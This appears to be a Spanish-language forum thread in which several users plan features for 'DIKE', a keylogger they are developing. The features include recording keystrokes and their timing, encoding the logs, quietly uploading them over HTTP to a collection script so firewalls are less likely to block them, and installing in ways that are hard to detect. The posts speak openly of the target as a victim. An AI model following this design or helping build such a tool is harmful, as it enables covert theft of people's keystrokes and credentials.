próximo »

[Iker]

Bueno pos el presidente de por si jode mucho y uno que trabaja ( xDD ) y vive ocupado pos le toca de vez en cuando atenderlo, osease darle cita; así que echen requerimientos para la versión 1.0 de DIKE.

Salu2.

PD: No se den garra.

Att: Iker

[Iker]

Jo, se me había olvidado poner las que están sugeridas después de la charla de ayer con el flaco.

* Deshabilitar el logueo en Unicode.
* No usar FTP para la subida de logs.
* Realizar la subida de logs mediante HTTP por ser menos firewaliado y no tener que usar credenciales (Un CGI, script vbs, jsp, php, yo que coños se; lo que les venga en gana).
* Codificar el Log ( Codificar = simple = caesar, enigma, corrimiento, xor5, etc...).
* Loguear los tiempos transcurridos entre las teclas presionadas.
* Crear un reproductor del log ( el flaco se ofreció a hacerlo ) ( Dike Log Player xD ).
* Que funque en Seven xD.
* Alternativas a Hook global ( Ideas?... ( Si, puedo volverlo driver pero seria mas escandaloso instalarlo ) ).

Esas son las que hay por el momento así que opinen cuales van y cuales no.

PD: Con esas características el tamaño calculado a ojo cerrado y echando mañas seria de 20 Kb.

Salu2.

[tronador]

no se puede dejar el ftp como alternativa o eso sube mucho el peso? 
y smtp tampoco se puede agregar como alternativa?

[Iker]

Sip, pero por ejemplo la mayoría de empresas están cerrando SMTP a raíz de que se presentan ataques de envió de SPAM desde la red interna, así que solo aceptan protocolos de correo ( SMTP TLS, SMTP SSL ). Igual uds deciden, si dicen que SMTP queda pos queda no problem.

El problema  de FTP es que es inseguro y la clave queda quemada, entonces al realizar la subida de los logs es posible que el atacado borre la info en el FTP y se queda sin el pan y sin el queso.

Salu2.

Att: Iker

[Alluz]

El otro día instalé dike en una máquina y ni por el carajos encontré el log de donde guardaba las teclas presionadas. No estaba al lado del dike.exe :S

Me gustaría que:
1. Si le doy ejecutar, solo se ejecute para el usuario actual y el log se guarde al ladito del ejecutable.
2. Si le doy dike.exe -i,  se copie a alguna parte, se instale y guarde el log en algun lado predefinido.
3. Si le doy dike.exe -rl http://host/webservice.php haga lo mismo que 1, pero con remote logs por web.
4. Si le doy dike.exe -i -rl http://host/webservice.php haga lo mismo que 3, pero con logs por web.

Opcional:
5. Si le doy dike.exe -wd World Domination muajajjajajajaja

[Iker]

el 1 ya esta, el 2 ya esta, el 3 es el que propusimos con el flaco; no entiendo el 4; el 5 es facil si le da "dike.exe -wd Word Domination" se inyecta en la memoria de Word y escribe "Dominated success".

Salu2.

Att: Iker

[flacman]

jajaj y 6) q se meta al perfíl de WOW de la máquina, le robe todos los puntos de experiencia y se los transfiera a su muñeco xD

Pos yo propondría hacerlo con todo lo q se nos ocurra (smtp, ftp, html, etc) y mas bn compilar "version sin ftp" y así... Para el 3 y 4 RPM se encarga de eso (de montarnos el web service).

para lo del hook.... esta noche cojo google a ver si se me ocurre algo xD

[Alluz]

Estructura de cosa a enviar:

Variable 1=Tiempo tipo unix
Variable 2= Log Teclas capturadas en formato serializado en codigo propio.

El webserver es una sencilla app que:
1. Recibir variable 1 y 2 por post
2. Utilizar un una funcion como fopen para grabar lo recibido